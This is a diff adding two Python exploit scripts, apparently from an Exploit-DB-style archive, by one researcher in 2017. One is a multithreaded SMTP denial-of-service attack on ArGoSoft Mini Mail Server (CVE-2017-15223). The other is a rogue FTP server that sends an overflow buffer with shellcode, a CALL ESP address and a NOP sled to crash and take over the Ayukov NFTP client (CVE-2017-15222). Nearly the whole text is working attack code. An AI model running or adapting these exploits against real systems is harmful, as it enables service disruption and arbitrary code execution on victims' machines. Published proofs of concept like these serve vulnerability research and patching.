@ -0,0 +1,62 @@
 #!/usr/bin/env python
 # coding: utf-8
 ############ Description: ##########
 # The vulnerability was discovered during a vulnerability research lecture.
 #
 # Denial-of-service vulnerability in ArGoSoft Mini Mail Server 1.0.0.2
 # and earlier allows remote attackers to waste CPU resources (memory
 # consumption) via unspecified vectors.
 ####################################
 # Exploit Title: ArGoSoft Mini Mail Server - DoS (Memory Consumption)
 # Date: 2017-10-21
 # Exploit Author: Berk Cem Göksel
 # Contact: twitter.com/berkcgoksel || bgoksel.com
 # Vendor Homepage: http://www.argosoft.com
 # Software Link: http://www.argosoft.com/rootpages/MiniMail/Default.aspx
 # Version:  1.0.0.2
 # Tested on: Windows 10
 # Category: Windows Remote Denial-of-Service
 # CVE : CVE-2017-15223
 import socket
 from threading import Thread
 def data():
    ip = '127.0.0.1'
    port = 25
    counter = 50
    string = '&'
    while True:
        try:
            if counter >= 10000:
                counter = 0
            else:
                counter = counter + 50
                A = (string * counter) + 'user2@othermail.com'
                print "String lenght: " + str(len(A))
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.settimeout(5.0)
                sock.connect((ip, port))
                sock.send('HELO localhost\r\n' + 'MAIL FROM: user1@somemail.com\r\n' + 'RCPT TO: ' + A + '\r\nDATA\r\nMessage-ID:1224\r\SDFGQUIL\r\n"."\r\n' + 'QUIT\r\n')
                sock.recv(1024)
                sock.close()
        except Exception as e:
            continue
 def main():
    iterations = int(input("Threads: "))
    for i in range(iterations):
        t = Thread(target=data)
        t.start()
 if __name__ == '__main__':
    main()
--- a/platforms/windows/remote/43025.py
+++ b/platforms/windows/remote/43025.py
@ -0,0 +1,69 @@
 #!/usr/bin/env python
 # coding: utf-8
 ############ Description: ##########
 # The vulnerability was discovered during a vulnerability research lecture.
 # This is meant to be a PoC.
 ####################################
 # Exploit Title: Ayukov NFTP FTP Client - Buffer Overflow
 # Date: 2017-10-21
 # Exploit Author: Berk Cem Göksel
 # Contact: twitter.com/berkcgoksel || bgoksel.com
 # Vendor Homepage: http://ayukov.com/nftp/source-release.html
 # Software Link: ftp://ftp.ayukov.com/pub/nftp/
 # Version:  v1.71, v1.72, v1.8, v2.0
 # Tested on: Windows 10
 # Category: Windows Remote Exploit
 # CVE : CVE-2017-15222
 import socket
 IP = '127.0.0.1'
 port = 21
 #(exec calc.exe)
 shellcode=(
 "\xda\xc5\xbe\xda\xc6\x9a\xb6\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
 "\x33\x83\xc5\x04\x31\x75\x13\x03\xaf\xd5\x78\x43\xb3\x32\xf5"
 "\xac\x4b\xc3\x66\x24\xae\xf2\xb4\x52\xbb\xa7\x08\x10\xe9\x4b"
 "\xe2\x74\x19\xdf\x86\x50\x2e\x68\x2c\x87\x01\x69\x80\x07\xcd"
 "\xa9\x82\xfb\x0f\xfe\x64\xc5\xc0\xf3\x65\x02\x3c\xfb\x34\xdb"
 "\x4b\xae\xa8\x68\x09\x73\xc8\xbe\x06\xcb\xb2\xbb\xd8\xb8\x08"
 "\xc5\x08\x10\x06\x8d\xb0\x1a\x40\x2e\xc1\xcf\x92\x12\x88\x64"
 "\x60\xe0\x0b\xad\xb8\x09\x3a\x91\x17\x34\xf3\x1c\x69\x70\x33"
 "\xff\x1c\x8a\x40\x82\x26\x49\x3b\x58\xa2\x4c\x9b\x2b\x14\xb5"
 "\x1a\xff\xc3\x3e\x10\xb4\x80\x19\x34\x4b\x44\x12\x40\xc0\x6b"
 "\xf5\xc1\x92\x4f\xd1\x8a\x41\xf1\x40\x76\x27\x0e\x92\xde\x98"
 "\xaa\xd8\xcc\xcd\xcd\x82\x9a\x10\x5f\xb9\xe3\x13\x5f\xc2\x43"
 "\x7c\x6e\x49\x0c\xfb\x6f\x98\x69\xf3\x25\x81\xdb\x9c\xe3\x53"
 "\x5e\xc1\x13\x8e\x9c\xfc\x97\x3b\x5c\xfb\x88\x49\x59\x47\x0f"
 "\xa1\x13\xd8\xfa\xc5\x80\xd9\x2e\xa6\x47\x4a\xb2\x07\xe2\xea"
 "\x51\x58")
 CALL_ESP = "\xdd\xfc\x40\x00" # call esp - nftpc.exe  #0040FCDD
 buff = "A" * 4116 + CALL_ESP + '\x90' * 16 + shellcode + "C" * (15000-4116-4-16-len(shellcode))
 #Can call esp but the null byte terminates the string.
 try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((IP, port))
        s.listen(20)
        print("[i] FTP Server started on port: "+str(port)+"\r\n")
 except:
        print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
 while True:
    conn, addr = s.accept()
    conn.send('220 Welcome!' + '\r\n')
    print conn.recv(1024)
    conn.send('331 OK.\r\n')
    print conn.recv(1024)
    conn.send('230 OK.\r\n')
    print conn.recv(1024)
    conn.send(buff + '\r\n')
    print conn.recv(1024)
    conn.send('257' + '\r\n')